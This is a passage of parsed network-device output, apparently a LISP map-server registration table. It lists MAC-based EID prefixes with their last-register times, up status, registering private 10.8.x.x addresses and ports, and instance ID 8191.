"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c6a.7aff.5860/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"1c6a.7aff.5e6a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.5f17/48": {
"last_register": "1d04h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"1c6a.7aff.62d5/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.6462/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"1c6a.7aff.65e9/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"1c6a.7aff.7026/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.709a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.76fc/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.83e0/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"1c6a.7aff.8539/48": {
"last_register": "5d19h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"1c6a.7aff.87a5/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"1c6a.7aff.95a6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c6a.7aff.9bb5/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.9d1f/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.a284/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.a286/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.a382/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c6a.7aff.aabc/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.adb9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"1c6a.7aff.afa7/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"1c6a.7aff.b592/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"1c6a.7aff.b5b4/48": {
"last_register": "00:04:01",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.b696/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.b703/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"1c6a.7aff.b957/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.b9a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.c76c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.c853/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.d203/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.d499/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.dc90/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.df2f/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.e49b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.e741/48": {
"last_register": "5d23h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"1c6a.7aff.e8be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c6a.7aff.f1f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.f115/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"1c6a.7aff.fb74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c6a.7aff.fc99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"1c6a.7aff.0021/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.0318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1ce8.5dff.dd5f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"1ce8.5dff.fe12/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"1ce8.5dff.b80d/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"203a.07ff.6701/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.23:20011",
"inst_id": 8191,
},
"203a.07ff.6ada/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"24b6.57ff.41c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"2834.a2ff.7029/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"2c01.b5ff.1828/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"2c01.b5ff.1a87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"2c01.b5ff.1e92/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2c01.b5ff.c320/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"2c01.b5ff.c356/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"2c01.b5ff.c620/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"2c01.b5ff.ca1f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"2c01.b5ff.dd0c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"2c0b.e9ff.ca4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"2c31.24ff.60f0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"2c31.24ff.6000/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"2c31.24ff.8713/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"2c31.24ff.adb3/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2c31.24ff.4e76/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2c31.24ff.b476/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"2c31.24ff.ebc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"2c3e.cfff.1d6d/48": {
"last_register": "3d10h",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"2c86.d2ff.9612/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2cab.ebff.946a/48": {
"last_register": "00:03:52",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"34bd.c8ff.505f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"34bd.c8ff.0c1c/48": {
"last_register": "23:57:44",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"34db.fdff.d2a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"3c0e.23ff.9056/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.d039/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.d198/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.d24b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.d47e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.d591/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6a94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.6ad8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6a42/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.6b89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.6bc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"3c0e.23ff.6b46/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6c79/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"3c0e.23ff.6c13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6eaa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"3c0e.23ff.6f88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2ba4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.2baf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.2bce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2c16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2c1e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.2c67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"3c0e.23ff.2ddd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.2e52/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.2e59/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.2f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2f89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"3c0e.23ff.2f92/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"3c41.0eff.bea6/48": {
"last_register": "08:34:00",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"3c41.0eff.bff0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"3c41.0eff.c48e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"3c41.0eff.d445/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"3c41.0eff.d547/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"3c41.0eff.dda5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"3c41.0eff.e459/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"3c41.0eff.e492/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"3c41.0eff.e5b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"3c41.0eff.6699/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c41.0eff.67bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"44e4.d9ff.de32/48": {
"last_register": "00:34:58",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"4cbc.48ff.6f0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"4ce1.76ff.cba6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"5006.abff.8996/48": {
"last_register": "06:13:25",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"5006.abff.8aa1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"5006.abff.8e76/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.e937/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"5006.abff.ec31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.51b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"5006.abff.52d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.5f07/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.66c3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.6a5c/48": {
"last_register": "04:14:18",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5006.abff.6ba0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.75f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"5006.abff.779d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5006.abff.7a67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.7d1c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"5006.abff.7e9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"5006.abff.9ab7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.9d0f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.a0cf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.a5a0/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5006.abff.ab97/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"5006.abff.abdf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.ac81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.acd2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5006.abff.aeb8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.aedc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.afba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.aff9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.af15/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.b410/48": {
"last_register": "04:10:51",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"5006.abff.3262/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5006.abff.3274/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"5017.ffff.75c9/48": {
"last_register": "1d22h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"501c.bfff.c2a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"50f7.22ff.8d1a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"50f7.22ff.ce8a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"50f7.22ff.d3e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"5897.1eff.35dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5897.bdff.8bb1/48": {
"last_register": "00:03:16",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5897.bdff.9031/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"58ac.78ff.3fdc/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"58ac.78ff.3f35/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"58ac.78ff.478f/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"58ac.78ff.7772/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"58ac.78ff.7774/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"58ac.78ff.7775/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"58ac.78ff.777b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"58ac.78ff.777d/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"58ac.78ff.7c1f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"58ac.78ff.7dce/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"58ac.78ff.7dcf/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"5c50.15ff.71b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"5c50.15ff.7c03/48": {
"last_register": "00:46:31",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"5c83.8fff.87b6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"5c83.8fff.a1d8/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5c83.8fff.b57e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5c83.8fff.b5b4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"5c83.8fff.b5b6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.b5bb/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.b5c2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.b5db/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.bff2/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"5c83.8fff.bf1b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"5c83.8fff.ccc9/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.cc04/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.cc3a/48": {
"last_register": "2d23h",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"5c83.8fff.cc3b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.cc4a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"5c83.8fff.d509/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"5c83.8fff.d510/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"5c83.8fff.d511/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.d519/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"5c83.8fff.d51a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.e6b3/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.f713/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5c83.8fff.0717/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"5c83.8fff.3de7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"5c83.8fff.b69b/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.b6a2/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.b6a3/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.b6ab/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.b6c6/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.b7e0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.b7e2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.b789/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5c83.8fff.d22a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"649e.f3ff.88c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"649e.f3ff.898f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"649e.f3ff.89ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"649e.f3ff.89eb/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"649e.f3ff.894f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"649e.f3ff.8f23/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"649e.f3ff.90dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"649e.f3ff.91ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"649e.f3ff.9536/48": {
